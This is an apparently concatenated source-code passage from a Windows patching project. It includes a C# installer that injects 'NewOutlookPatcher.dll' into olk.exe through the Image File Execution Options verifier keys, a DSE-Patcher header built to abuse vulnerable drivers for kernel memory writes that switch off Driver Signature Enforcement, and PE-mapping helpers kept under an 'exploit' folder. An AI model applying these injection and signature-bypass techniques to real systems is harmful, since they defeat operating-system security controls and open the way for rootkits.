L#_exp), \ 163 | DbgRaiseAssertionFailure(), FALSE) : \ 164 | TRUE) 165 | 166 | #define NT_ASSERTMSG_ACTION(_msg, _exp) \ 167 | ((!(_exp)) ? \ 168 | (__annotation((PWCHAR)L"Debug", L"AssertFail", L##_msg), \ 169 | DbgRaiseAssertionFailure(), FALSE) : \ 170 | TRUE) 171 | 172 | #define NT_ASSERTMSGW_ACTION(_msg, _exp) \ 173 | ((!(_exp)) ? \ 174 | (__annotation((PWCHAR)L"Debug", L"AssertFail", _msg), \ 175 | DbgRaiseAssertionFailure(), FALSE) : \ 176 | TRUE) 177 | #else 178 | #define NT_ASSERT_ACTION(_exp) \ 179 | ((!(_exp)) ? (__debugbreak(), FALSE) : TRUE) 180 | #define NT_ASSERTMSG_ACTION(_msg, _exp) \ 181 | NT_ASSERT_ACTION(_exp) 182 | #define NT_ASSERTMSGW_ACTION(_msg, _exp) \ 183 | NT_ASSERT_ACTION(_exp) 184 | #endif 185 | 186 | #if defined(_DEBUG) || defined(DBG) 187 | #define NT_ASSERT_ASSUME(_exp) \ 188 | (NT_ANALYSIS_ASSUME(_exp), NT_ASSERT_ACTION(_exp)) 189 | 190 | #define NT_ASSERTMSG_ASSUME(_msg, _exp) \ 191 | (NT_ANALYSIS_ASSUME(_exp), NT_ASSERTMSG_ACTION(_msg, _exp)) 192 | 193 | #define NT_ASSERTMSGW_ASSUME(_msg, _exp) \ 194 | (NT_ANALYSIS_ASSUME(_exp), NT_ASSERTMSGW_ACTION(_msg, _exp)) 195 | 196 | #define NT_ASSERT NT_ASSERT_ASSUME 197 | #define NT_ASSERTMSG NT_ASSERTMSG_ASSUME 198 | #define NT_ASSERTMSGW NT_ASSERTMSGW_ASSUME 199 | #else 200 | #define NT_ASSERT(_exp) ((void) 0) 201 | #define NT_ASSERTMSG(_msg, _exp) ((void) 0) 202 | #define NT_ASSERTMSGW(_msg, _exp) ((void) 0) 203 | #endif 204 | 205 | #ifdef __cplusplus 206 | } 207 | #endif 208 | 209 | #ifdef __cplusplus 210 | #pragma warning(push) 211 | #pragma warning(disable:4309) 212 | template 213 | struct static_print // Usage: static_print()() prints the value as a compiler warning 214 | { 215 | CHAR operator()() CONST { return N + 256; } 216 | }; 217 | #pragma warning(pop) 218 | 219 | template 220 | void print_size() { static_print()(); } 221 | #endif 222 | -------------------------------------------------------------------------------- /NOP/gui/Form1.resx: -------------------------------------------------------------------------------- 1 | 2 | 3 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | text/microsoft-resx 110 | 111 | 112 | 2.0 113 | 114 | 115 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 116 | 117 | 118 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 119 | 120 | 121 | 17, 17 122 | 123 | -------------------------------------------------------------------------------- /NOP/gui/Program.cs: -------------------------------------------------------------------------------- 1 | using Microsoft.Win32; 2 | 3 | namespace gui 4 | { 5 | internal static class Program 6 | { 7 | /// 8 | /// The main entry point for the application. 9 | /// 10 | [STAThread] 11 | static void Main(string[] args) 12 | { 13 | string tempFolderName = ""; 14 | foreach (var arg in args) 15 | { 16 | tempFolderName = arg; 17 | } 18 | if (tempFolderName != "") 19 | { 20 | if (tempFolderName == "--uninstall") 21 | { 22 | try 23 | { 24 | RegistryKey localMachine = RegistryKey.OpenBaseKey(Microsoft.Win32.RegistryHive.LocalMachine, RegistryView.Registry64); 25 | var reg = localMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\olk.exe", true); 26 | if (reg != null) 27 | { 28 | bool stillIsVerified = false; 29 | var obj2 = reg.GetValue("VerifierDlls"); 30 | if (obj2 != null) 31 | { 32 | string verifierDlls = (string)obj2; 33 | verifierDlls = verifierDlls.Replace(" NewOutlookPatcher.dll", ""); 34 | verifierDlls = verifierDlls.Replace("NewOutlookPatcher.dll ", ""); 35 | verifierDlls = verifierDlls.Replace("NewOutlookPatcher.dll", ""); 36 | if (verifierDlls == "") 37 | { 38 | reg.DeleteValue("VerifierDlls"); 39 | } 40 | else 41 | { 42 | reg.SetValue("VerifierDlls", verifierDlls); 43 | stillIsVerified = true; 44 | } 45 | } 46 | 47 | var obj1 = reg.GetValue("GlobalFlag"); 48 | if (obj1 != null) 49 | { 50 | int val = (int)obj1; 51 | if (!stillIsVerified) 52 | { 53 | val = val & ~0x100; 54 | if (val == 0) 55 | { 56 | reg.DeleteValue("GlobalFlag"); 57 | } 58 | else 59 | { 60 | reg.SetValue("GlobalFlag", val); 61 | } 62 | } 63 | } 64 | 65 | if (!(reg.SubKeyCount > 0 || reg.ValueCount > 0)) 66 | { 67 | reg.Close(); 68 | localMachine.DeleteSubKeyTree("SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\olk.exe", false); 69 | } 70 | } 71 | File.Delete(Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.System), "NewOutlookPatcher.dll")); 72 | } 73 | catch { } 74 | } 75 | else 76 | { 77 | try 78 | { 79 | File.Copy(Path.Combine(tempFolderName, "NewOutlookPatcher.dll"), Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.System), "NewOutlookPatcher.dll"), true); 80 | } 81 | catch { } 82 | finally 83 | { 84 | try 85 | { 86 | RegistryKey localMachine = RegistryKey.OpenBaseKey(Microsoft.Win32.RegistryHive.LocalMachine, RegistryView.Registry64); 87 | var reg = localMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\olk.exe", true); 88 | if (reg == null) 89 | { 90 | reg = localMachine.CreateSubKey("SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\olk.exe"); 91 | } 92 | 93 | var obj1 = reg.GetValue("GlobalFlag"); 94 | if (obj1 != null) 95 | { 96 | int val = (int)obj1; 97 | val = val | 0x100; 98 | reg.SetValue("GlobalFlag", val); 99 | } 100 | else 101 | { 102 | reg.SetValue("GlobalFlag", 0x100); 103 | } 104 | 105 | var obj2 = reg.GetValue("VerifierDlls"); 106 | if (obj2 != null) 107 | { 108 | string verifierDlls = (string)obj2; 109 | if (!verifierDlls.Contains(" NewOutlookPatcher.dll") && !verifierDlls.Contains("NewOutlookPatcher.dll ") && verifierDlls != "NewOutlookPatcher.dll") 110 | { 111 | verifierDlls += " NewOutlookPatcher.dll"; 112 | reg.SetValue("VerifierDlls", verifierDlls); 113 | } 114 | } 115 | else 116 | { 117 | reg.SetValue("VerifierDlls", "NewOutlookPatcher.dll"); 118 | } 119 | } 120 | catch { } 121 | } 122 | } 123 | Environment.Exit(0); 124 | } 125 | // To customize application configuration such as set high DPI settings or default font, 126 | // see https://aka.ms/applicationconfiguration. 127 | ApplicationConfiguration.Initialize(); 128 | Application.Run(new Form1()); 129 | } 130 | } 131 | } -------------------------------------------------------------------------------- /NOP/loader2/MyFunctions.h: -------------------------------------------------------------------------------- 1 | 2 | // DSE-Patcher - Patch DSE (Driver Signature Enforcement) 3 | // Copyright (C) 2022 Kai Schtrom 4 | // 5 | // This file is part of DSE-Patcher. 6 | // 7 | // DSE-Patcher is free software: you can redistribute it and/or modify 8 | // it under the terms of the GNU General Public License as published by 9 | // the Free Software Foundation, either version 3 of the License, or 10 | // (at your option) any later version. 11 | // 12 | // DSE-Patcher is distributed in the hope that it will be useful, 13 | // but WITHOUT ANY WARRANTY; without even the implied warranty of 14 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 15 | // GNU General Public License for more details. 16 | // 17 | // You should have received a copy of the GNU General Public License 18 | // along with DSE-Patcher. If not, see . 19 | 20 | #ifndef _MYFUNCTIONS 21 | #define _MYFUNCTIONS 22 | 23 | // Attention: The library file msvcrt.lib is copied from "C:\WinDDK\7600.16385.1\lib\Crt\amd64". 24 | // This import library reduces the executable size and we have not to install any Microsoft 25 | // redistributables to run the executable. 26 | 27 | #define APPNAME "DSE-Patcher" 28 | #define VERSION "V1.0" 29 | #define BUILD "Build 20221127" 30 | 31 | // deprecate unsafe function warnings e.g. strcpy, sprintf 32 | #define _CRT_SECURE_NO_DEPRECATE 33 | 34 | #include 35 | #include 36 | // sprintf 37 | #include 38 | // NtQuerySystemInformation 39 | #include 40 | #include 41 | // MAX_CLASS_NAME_LEN 42 | #include 43 | // UpdateDriverForPlugAndPlayDevices 44 | #include 45 | // ACL function e.g. SetNamedSecurityInfo 46 | #include 47 | // PathFileExists 48 | #include 49 | #include "MyDialog1.h" 50 | 51 | // SetupAPI functions 52 | #pragma comment(lib,"setupapi.lib") 53 | // UpdateDriverForPlugAndPlayDevices 54 | #pragma comment(lib,"newdev.lib") 55 | // PathFileExists 56 | #pragma comment(lib,"shlwapi.lib") 57 | 58 | // maximum number of supported vulnerable drivers 59 | #define MAX_VULNERABLE_DRIVERS 5 60 | // maximum number of supported driver files 61 | #define MAX_DRIVER_FILES 4 62 | 63 | // NtQuerySystemInformation structures 64 | typedef struct _RTL_PROCESS_MODULE_INFORMATION 65 | { 66 | HANDLE Section; 67 | PVOID MappedBase; 68 | PVOID ImageBase; 69 | ULONG ImageSize; 70 | ULONG Flags; 71 | USHORT LoadOrderIndex; 72 | USHORT InitOrderIndex; 73 | USHORT LoadCount; 74 | USHORT OffsetToFileName; 75 | UCHAR FullPathName[256]; 76 | }RTL_PROCESS_MODULE_INFORMATION,*PRTL_PROCESS_MODULE_INFORMATION; 77 | 78 | typedef struct _RTL_PROCESS_MODULES 79 | { 80 | ULONG NumberOfModules; 81 | RTL_PROCESS_MODULE_INFORMATION Modules[1]; 82 | }RTL_PROCESS_MODULES,*PRTL_PROCESS_MODULES; 83 | 84 | // forward declaration of structure for use in function pointers of start and stop driver 85 | struct _VULNERABLE_DRIVER; 86 | 87 | // vulnerable driver structure function prototypes 88 | typedef int (*FunctionOpenDevice)(char *szDriverFile,HANDLE *hDevice); 89 | typedef int (*FunctionReadMemory)(HANDLE hDevice,DWORD64 dw64Address,DWORD dwSize,DWORD *dwValue); 90 | typedef int (*FunctionWriteMemory)(HANDLE hDevice,DWORD64 dw64Address,DWORD dwSize,DWORD dwValue); 91 | typedef int (*FunctionStartDriver)(_VULNERABLE_DRIVER *vd); 92 | typedef int (*FunctionStopDriver)(_VULNERABLE_DRIVER *vd); 93 | 94 | // driver files structure 95 | typedef struct _DRIVER_FILE 96 | { 97 | char szFilePath[MAX_PATH]; 98 | BYTE *bData; 99 | DWORD dwSize; 100 | }DRIVER_FILE,*PDRIVER_FILE; 101 | 102 | // vulnerable driver structure 103 | typedef struct _VULNERABLE_DRIVER 104 | { 105 | const char *szProvider; 106 | const char *szToolTipText; 107 | FunctionOpenDevice pFunctionOpenDevice; 108 | FunctionReadMemory pFunctionReadMemory; 109 | FunctionWriteMemory pFunctionWriteMemory; 110 | FunctionStartDriver pFunctionStartDriver; 111 | FunctionStopDriver pFunctionStopDriver; 112 | const char *szServiceName; 113 | const char *szDriverSymLink; 114 | // reserve space for max number of driver files (sys, inf, cat and WDFCoInstaller DLL) 115 | DRIVER_FILE driverFile[MAX_DRIVER_FILES]; 116 | const char *szHardwareId; 117 | HDEVINFO DeviceInfoSet; 118 | SP_DEVINFO_DATA DeviceInfoData; 119 | DWORD dwMinSupportedBuildNumber; 120 | DWORD dwMaxSupportedBuildNumber; 121 | }VULNERABLE_DRIVER,*PVULNERABLE_DRIVER; 122 | 123 | // patch data structure 124 | typedef struct _PATCH_DATA 125 | { 126 | // operating system 127 | const char *szOS; 128 | // module to patch 129 | const char *szModuleName; 130 | // variable name in module to patch e.g. g_CiEnabled, g_CiOptions 131 | const char *szVariableName; 132 | // DSE original value 133 | DWORD dwDSEOriginalValue; 134 | // DSE disable value 135 | DWORD dwDSEDisableValue; 136 | // DSE enable value 137 | DWORD dwDSEEnableValue; 138 | // DSE actual value 139 | DWORD dwDSEActualValue; 140 | // patch size in bytes 141 | DWORD dwPatchSize; 142 | // image base of module to patch 143 | UINT64 ui64ImageBase; 144 | // image size of module to patch 145 | ULONG ulImageSize; 146 | // variable address to patch 147 | UINT64 ui64PatchAddress; 148 | // DSE status 149 | const char *szDSEStatus; 150 | }PATCH_DATA,*PPATCH_DATA; 151 | 152 | // thread task number enumeration 153 | typedef enum 154 | { 155 | ThreadTaskReadDSEOnFirstRun = 1, 156 | ThreadTaskDisableDSE = 2, 157 | ThreadTaskEnableDSE = 3, 158 | ThreadTaskRestoreDSE = 4 159 | }THREAD_TASK_NO; 160 | 161 | // thread parameter structure 162 | typedef struct _THREAD_PARAMS 163 | { 164 | THREAD_TASK_NO ttno; 165 | }THREAD_PARAMS,*PTHREAD_PARAMS; 166 | 167 | // dialog1 structure 168 | typedef struct _DIALOG1 169 | { 170 | HWND hDialog1; 171 | HWND hButton1; 172 | HWND hButton2; 173 | HWND hButton3; 174 | HWND hCombo1; 175 | HWND hStatic1; 176 | HWND hStatusBar1; 177 | unsigned int uiTimerSeconds; 178 | unsigned int uiTimerMinutes; 179 | unsigned int uiTimerHours; 180 | }DIALOG1,*PDIALOG1; 181 | 182 | // globals structure 183 | typedef struct _GLOBALS 184 | { 185 | DIALOG1 Dlg1; 186 | HMODULE hInstance; 187 | unsigned char ucRunning; 188 | THREAD_PARAMS ThreadParams; 189 | VULNERABLE_DRIVER vd[MAX_VULNERABLE_DRIVERS]; 190 | PATCH_DATA pd; 191 | char szMsg[1024]; 192 | }GLOBALS,*PGLOBALS; 193 | 194 | //------------------------------------------------------------------------------ 195 | // exported functions 196 | //------------------------------------------------------------------------------ 197 | 198 | int MyInitVulnerableDrivers(VULNERABLE_DRIVER *vd,DWORD dwElements); 199 | DWORD WINAPI MyThreadProc1(PVOID pvoid); 200 | 201 | #endif // _MYFUNCTIONS 202 | 203 | -------------------------------------------------------------------------------- /exploit/pe.cpp: -------------------------------------------------------------------------------- 1 | #include "../global.h" 2 | 3 | #define IMAGE32(NtHeaders) ((NtHeaders)->OptionalHeader.Magic == IMAGE_NT_OPTIONAL_HDR32_MAGIC) 4 | #define IMAGE64(NtHeaders) ((NtHeaders)->OptionalHeader.Magic == IMAGE_NT_OPTIONAL_HDR64_MAGIC) 5 | 6 | #define HEADER_FIELD(NtHeaders, Field) (IMAGE64(NtHeaders) \ 7 | ? ((PIMAGE_NT_HEADERS64)(NtHeaders))->OptionalHeader.Field \ 8 | : ((PIMAGE_NT_HEADERS32)(NtHeaders))->OptionalHeader.Field) 9 | 10 | static 11 | NTSTATUS 12 | RtlOpenFile( 13 | _Out_ PHANDLE FileHandle, 14 | _In_ PCWCHAR Filename 15 | ) 16 | { 17 | *FileHandle = NULL; 18 | 19 | UNICODE_STRING NtPath; 20 | RTL_RELATIVE_NAME_U RelativeName; 21 | NTSTATUS Status = RtlDosPathNameToRelativeNtPathName_U_WithStatus(const_cast(Filename), 22 | &NtPath, 23 | NULL, 24 | &RelativeName); 25 | if (!NT_SUCCESS(Status)) 26 | return Status; 27 | 28 | const BOOLEAN PathIsRelative = RelativeName.RelativeName.Length > 0; 29 | OBJECT_ATTRIBUTES ObjectAttributes; 30 | IO_STATUS_BLOCK IoStatusBlock; 31 | InitializeObjectAttributes(&ObjectAttributes, 32 | PathIsRelative ? &RelativeName.RelativeName : &NtPath, 33 | OBJ_CASE_INSENSITIVE, 34 | PathIsRelative ? RelativeName.ContainingDirectory : NULL, 35 | NULL); 36 | 37 | Status = NtCreateFile(FileHandle, 38 | FILE_GENERIC_READ | SYNCHRONIZE, 39 | &ObjectAttributes, 40 | &IoStatusBlock, 41 | NULL, 42 | FILE_ATTRIBUTE_NORMAL, 43 | FILE_SHARE_READ, 44 | FILE_OPEN, 45 | FILE_NON_DIRECTORY_FILE | FILE_SYNCHRONOUS_IO_NONALERT, 46 | NULL, 47 | 0); 48 | 49 | RtlFreeHeap(RtlProcessHeap(), 0, NtPath.Buffer); 50 | RtlReleaseRelativeName(&RelativeName); 51 | 52 | return Status; 53 | } 54 | 55 | NTSTATUS 56 | MapFileSectionView( 57 | _In_ PCWCHAR Filename, 58 | _In_ BOOLEAN ForceDisableAslr, 59 | _Out_ PVOID *ImageBase, 60 | _Out_ PSIZE_T ViewSize 61 | ) 62 | { 63 | *ImageBase = NULL; 64 | *ViewSize = 0; 65 | 66 | // Open the file 67 | HANDLE FileHandle = NULL; 68 | NTSTATUS Status = RtlOpenFile(&FileHandle, Filename); 69 | if (!NT_SUCCESS(Status)) 70 | { 71 | printf("NtCreateFile: 0x%08X\n", Status); 72 | return Status; 73 | } 74 | ULONG_PTR PreferredImageBase = 0; 75 | HANDLE SectionHandle = NULL; 76 | if (ForceDisableAslr) 77 | { 78 | UCHAR HeadersBuffer[0x400]; 79 | IO_STATUS_BLOCK IoStatusBlock; 80 | Status = NtReadFile(FileHandle, 81 | NULL, 82 | NULL, 83 | NULL, 84 | &IoStatusBlock, 85 | HeadersBuffer, 86 | sizeof(HeadersBuffer), 87 | NULL, 88 | NULL); 89 | 90 | if (!NT_SUCCESS(Status)) 91 | { 92 | printf("NtReadFile: 0x%08X\n", Status); 93 | goto Exit; 94 | } 95 | 96 | PIMAGE_NT_HEADERS NtHeaders; 97 | Status = RtlImageNtHeaderEx(0, HeadersBuffer, sizeof(HeadersBuffer), &NtHeaders); 98 | if (!NT_SUCCESS(Status)) 99 | return Status; 100 | PreferredImageBase = HEADER_FIELD(NtHeaders, ImageBase); 101 | } 102 | 103 | // Obtain a section handle 104 | Status = NtCreateSection(&SectionHandle, 105 | STANDARD_RIGHTS_REQUIRED | SECTION_MAP_READ, 106 | NULL, 107 | NULL, 108 | PAGE_READONLY, 109 | SEC_IMAGE, 110 | FileHandle); 111 | if (!NT_SUCCESS(Status)) 112 | { 113 | printf("NtCreateSection: 0x%08X\n", Status); 114 | goto Exit; 115 | } 116 | 117 | // Map a read only section view 118 | *ImageBase = reinterpret_cast(PreferredImageBase); 119 | *ViewSize = 0; 120 | Status = NtMapViewOfSection(SectionHandle, 121 | NtCurrentProcess, 122 | ImageBase, 123 | 0, 124 | 0, 125 | NULL, 126 | ViewSize, 127 | ViewUnmap, 128 | 0, 129 | PAGE_READONLY); 130 | 131 | if (Status == STATUS_IMAGE_NOT_AT_BASE) // Fix false positive or N/A status 132 | { 133 | if (ForceDisableAslr && *ImageBase == reinterpret_cast(PreferredImageBase)) 134 | Status = STATUS_SUCCESS; 135 | else if (!ForceDisableAslr) 136 | Status = STATUS_SUCCESS; 137 | } 138 | 139 | if (!NT_SUCCESS(Status)) 140 | printf("NtMapViewOfSection: 0x%08X\n", Status); 141 | 142 | Exit: 143 | NtClose(FileHandle); 144 | if (SectionHandle != NULL) 145 | NtClose(SectionHandle); 146 | 147 | return Status; 148 | } 149 | 150 | PVOID 151 | GetProcedureAddress( 152 | _In_ ULONG_PTR DllBase, 153 | _In_ PCSTR RoutineName 154 | ) 155 | { 156 | // Find and verify PE headers 157 | const PIMAGE_DOS_HEADER DosHeader = reinterpret_cast(DllBase); 158 | if (DosHeader->e_magic != IMAGE_DOS_SIGNATURE) 159 | return NULL; 160 | const PIMAGE_NT_HEADERS NtHeaders = reinterpret_cast(DllBase + DosHeader->e_lfanew); 161 | if (NtHeaders->Signature != IMAGE_NT_SIGNATURE) 162 | return NULL; 163 | 164 | // Get the export directory RVA and size 165 | const PIMAGE_DATA_DIRECTORY ImageDirectories = HEADER_FIELD(NtHeaders, DataDirectory); 166 | const ULONG ExportDirRva = ImageDirectories[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress; 167 | const ULONG ExportDirSize = ImageDirectories[IMAGE_DIRECTORY_ENTRY_EXPORT].Size; 168 | 169 | // Read the export directory 170 | const PIMAGE_EXPORT_DIRECTORY ExportDirectory = reinterpret_cast(DllBase + ExportDirRva); 171 | const PULONG AddressOfFunctions = reinterpret_cast(DllBase + ExportDirectory->AddressOfFunctions); 172 | const PUSHORT AddressOfNameOrdinals = reinterpret_cast(DllBase + ExportDirectory->AddressOfNameOrdinals); 173 | const PULONG AddressOfNames = reinterpret_cast(DllBase + ExportDirectory->AddressOfNames); 174 | 175 | // Look up the import name in the name table using a binary search 176 | LONG Low = 0; 177 | LONG Middle = 0; 178 | LONG High = ExportDirectory->NumberOfNames - 1; 179 | 180 | while (High >= Low) 181 | { 182 | // Compute the next probe index and compare the import name 183 | Middle = (Low + High) >> 1; 184 | const LONG Result = strcmp(RoutineName, reinterpret_cast(DllBase + AddressOfNames[Middle])); 185 | if (Result < 0) 186 | High = Middle - 1; 187 | else if (Result > 0) 188 | Low = Middle + 1; 189 | else 190 | break; 191 | } 192 | 193 | // If the high index is less than the low index, then a matching table entry 194 | // was not found. Otherwise, get the ordinal number from the ordinal table 195 | if (High < Low || Middle >= static_cast(ExportDirectory->NumberOfFunctions)) 196 | return NULL; 197 | const ULONG FunctionRva = AddressOfFunctions[AddressOfNameOrdinals[Middle]]; 198 | if (FunctionRva >= ExportDirRva && FunctionRva < ExportDirRva + ExportDirSize) 199 | return NULL; // Ignore forwarded exports 200 | 201 | return reinterpret_cast(DllBase + FunctionRva); 202 | } 203 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | ## Ignore Visual Studio temporary files, build results, and 2 | ## files generated by popular Visual Studio add-ons. 3 | ## 4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore 5 | 6 | *.dll 7 | 8 | # User-specific files 9 | *.rsuser 10 | *.suo 11 | *.user 12 | *.userosscache 13 | *.sln.docstates 14 | 15 | # User-specific files (MonoDevelop/Xamarin Studio) 16 | *.userprefs 17 | 18 | # Mono auto generated files 19 | mono_crash.* 20 | 21 | # Build results 22 | [Dd]ebug/ 23 | [Dd]ebugPublic/ 24 | [Rr]elease/ 25 | [Rr]eleases/ 26 | x64/ 27 | x86/ 28 | [Ww][Ii][Nn]32/ 29 | [Aa][Rr][Mm]/ 30 | [Aa][Rr][Mm]64/ 31 | bld/ 32 | [Bb]in/ 33 | [Oo]bj/ 34 | [Oo]ut/ 35 | [Ll]og/ 36 | [Ll]ogs/ 37 | 38 | # Visual Studio 2015/2017 cache/options directory 39 | .vs/ 40 | # Uncomment if you have tasks that create the project's static files in wwwroot 41 | #wwwroot/ 42 | 43 | # Visual Studio 2017 auto generated files 44 | Generated\ Files/ 45 | 46 | # MSTest test Results 47 | [Tt]est[Rr]esult*/ 48 | [Bb]uild[Ll]og.* 49 | 50 | # NUnit 51 | *.VisualState.xml 52 | TestResult.xml 53 | nunit-*.xml 54 | 55 | # Build Results of an ATL Project 56 | [Dd]ebugPS/ 57 | [Rr]eleasePS/ 58 | dlldata.c 59 | 60 | # Benchmark Results 61 | BenchmarkDotNet.Artifacts/ 62 | 63 | # .NET Core 64 | project.lock.json 65 | project.fragment.lock.json 66 | artifacts/ 67 | 68 | # ASP.NET Scaffolding 69 | ScaffoldingReadMe.txt 70 | 71 | # StyleCop 72 | StyleCopReport.xml 73 | 74 | # Files built by Visual Studio 75 | *_i.c 76 | *_p.c 77 | *_h.h 78 | *.ilk 79 | *.meta 80 | *.obj 81 | *.iobj 82 | *.pch 83 | *.pdb 84 | *.ipdb 85 | *.pgc 86 | *.pgd 87 | *.rsp 88 | *.sbr 89 | *.tlb 90 | *.tli 91 | *.tlh 92 | *.tmp 93 | *.tmp_proj 94 | *_wpftmp.csproj 95 | *.log 96 | *.vspscc 97 | *.vssscc 98 | .builds 99 | *.pidb 100 | *.svclog 101 | *.scc 102 | 103 | # Chutzpah Test files 104 | _Chutzpah* 105 | 106 | # Visual C++ cache files 107 | ipch/ 108 | *.aps 109 | *.ncb 110 | *.opendb 111 | *.opensdf 112 | *.sdf 113 | *.cachefile 114 | *.VC.db 115 | *.VC.VC.opendb 116 | 117 | # Visual Studio profiler 118 | *.psess 119 | *.vsp 120 | *.vspx 121 | *.sap 122 | 123 | # Visual Studio Trace Files 124 | *.e2e 125 | 126 | # TFS 2012 Local Workspace 127 | $tf/ 128 | 129 | # Guidance Automation Toolkit 130 | *.gpState 131 | 132 | # ReSharper is a .NET coding add-in 133 | _ReSharper*/ 134 | *.[Rr]e[Ss]harper 135 | *.DotSettings.user 136 | 137 | # TeamCity is a build add-in 138 | _TeamCity* 139 | 140 | # DotCover is a Code Coverage Tool 141 | *.dotCover 142 | 143 | # AxoCover is a Code Coverage Tool 144 | .axoCover/* 145 | !.axoCover/settings.json 146 | 147 | # Coverlet is a free, cross platform Code Coverage Tool 148 | coverage*.json 149 | coverage*.xml 150 | coverage*.info 151 | 152 | # Visual Studio code coverage results 153 | *.coverage 154 | *.coveragexml 155 | 156 | # NCrunch 157 | _NCrunch_* 158 | .*crunch*.local.xml 159 | nCrunchTemp_* 160 | 161 | # MightyMoose 162 | *.mm.* 163 | AutoTest.Net/ 164 | 165 | # Web workbench (sass) 166 | .sass-cache/ 167 | 168 | # Installshield output folder 169 | [Ee]xpress/ 170 | 171 | # DocProject is a documentation generator add-in 172 | DocProject/buildhelp/ 173 | DocProject/Help/*.HxT 174 | DocProject/Help/*.HxC 175 | DocProject/Help/*.hhc 176 | DocProject/Help/*.hhk 177 | DocProject/Help/*.hhp 178 | DocProject/Help/Html2 179 | DocProject/Help/html 180 | 181 | # Click-Once directory 182 | publish/ 183 | 184 | # Publish Web Output 185 | *.[Pp]ublish.xml 186 | *.azurePubxml 187 | # Note: Comment the next line if you want to checkin your web deploy settings, 188 | # but database connection strings (with potential passwords) will be unencrypted 189 | *.pubxml 190 | *.publishproj 191 | 192 | # Microsoft Azure Web App publish settings. Comment the next line if you want to 193 | # checkin your Azure Web App publish settings, but sensitive information contained 194 | # in these scripts will be unencrypted 195 | PublishScripts/ 196 | 197 | # NuGet Packages 198 | *.nupkg 199 | # NuGet Symbol Packages 200 | *.snupkg 201 | # The packages folder can be ignored because of Package Restore 202 | **/[Pp]ackages/* 203 | # except build/, which is used as an MSBuild target. 204 | !**/[Pp]ackages/build/ 205 | # Uncomment if necessary however generally it will be regenerated when needed 206 | #!**/[Pp]ackages/repositories.config 207 | # NuGet v3's project.json files produces more ignorable files 208 | *.nuget.props 209 | *.nuget.targets 210 | 211 | # Microsoft Azure Build Output 212 | csx/ 213 | *.build.csdef 214 | 215 | # Microsoft Azure Emulator 216 | ecf/ 217 | rcf/ 218 | 219 | # Windows Store app package directories and files 220 | AppPackages/ 221 | BundleArtifacts/ 222 | Package.StoreAssociation.xml 223 | _pkginfo.txt 224 | *.appx 225 | *.appxbundle 226 | *.appxupload 227 | 228 | # Visual Studio cache files 229 | # files ending in .cache can be ignored 230 | *.[Cc]ache 231 | # but keep track of directories ending in .cache 232 | !?*.[Cc]ache/ 233 | 234 | # Others 235 | ClientBin/ 236 | ~$* 237 | *~ 238 | *.dbmdl 239 | *.dbproj.schemaview 240 | *.jfm 241 | *.pfx 242 | *.publishsettings 243 | orleans.codegen.cs 244 | 245 | # Including strong name files can present a security risk 246 | # (https://github.com/github/gitignore/pull/2483#issue-259490424) 247 | #*.snk 248 | 249 | # Since there are multiple workflows, uncomment next line to ignore bower_components 250 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) 251 | #bower_components/ 252 | 253 | # RIA/Silverlight projects 254 | Generated_Code/ 255 | 256 | # Backup & report files from converting an old project file 257 | # to a newer Visual Studio version. Backup files are not needed, 258 | # because we have git ;-) 259 | _UpgradeReport_Files/ 260 | Backup*/ 261 | UpgradeLog*.XML 262 | UpgradeLog*.htm 263 | ServiceFabricBackup/ 264 | *.rptproj.bak 265 | 266 | # SQL Server files 267 | *.mdf 268 | *.ldf 269 | *.ndf 270 | 271 | # Business Intelligence projects 272 | *.rdl.data 273 | *.bim.layout 274 | *.bim_*.settings 275 | *.rptproj.rsuser 276 | *- [Bb]ackup.rdl 277 | *- [Bb]ackup ([0-9]).rdl 278 | *- [Bb]ackup ([0-9][0-9]).rdl 279 | 280 | # Microsoft Fakes 281 | FakesAssemblies/ 282 | 283 | # GhostDoc plugin setting file 284 | *.GhostDoc.xml 285 | 286 | # Node.js Tools for Visual Studio 287 | .ntvs_analysis.dat 288 | node_modules/ 289 | 290 | # Visual Studio 6 build log 291 | *.plg 292 | 293 | # Visual Studio 6 workspace options file 294 | *.opt 295 | 296 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.) 297 | *.vbw 298 | 299 | # Visual Studio LightSwitch build output 300 | **/*.HTMLClient/GeneratedArtifacts 301 | **/*.DesktopClient/GeneratedArtifacts 302 | **/*.DesktopClient/ModelManifest.xml 303 | **/*.Server/GeneratedArtifacts 304 | **/*.Server/ModelManifest.xml 305 | _Pvt_Extensions 306 | 307 | # Paket dependency manager 308 | .paket/paket.exe 309 | paket-files/ 310 | 311 | # FAKE - F# Make 312 | .fake/ 313 | 314 | # CodeRush personal settings 315 | .cr/personal 316 | 317 | # Python Tools for Visual Studio (PTVS) 318 | __pycache__/ 319 | *.pyc 320 | 321 | # Cake - Uncomment if you are using it 322 | # tools/** 323 | # !tools/packages.config 324 | 325 | # Tabs Studio 326 | *.tss 327 | 328 | # Telerik's JustMock configuration file 329 | *.jmconfig 330 | 331 | # BizTalk build output 332 | *.btp.cs 333 | *.btm.cs 334 | *.odx.cs 335 | *.xsd.cs 336 | 337 | # OpenCover UI analysis results 338 | OpenCover/ 339 | 340 | # Azure Stream Analytics local run output 341 | ASALocalRun/ 342 | 343 | # MSBuild Binary and Structured Log 344 | 